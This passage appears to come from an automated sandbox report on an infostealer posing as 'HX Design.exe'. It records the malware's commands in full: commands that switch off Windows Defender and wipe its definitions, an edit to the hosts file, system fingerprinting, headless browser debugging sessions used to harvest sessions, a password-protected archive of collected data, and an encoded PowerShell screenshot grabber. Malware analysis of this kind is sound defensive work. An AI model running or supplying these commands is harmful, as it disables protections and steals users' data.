$screenshot.Dispose()}
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Users\user\Desktop\HX Design.exe "C:\Users\user\Desktop\HX Design.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.comJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=2223 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local/Microsoft/Edge/User Data" https://www.google.comJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgAC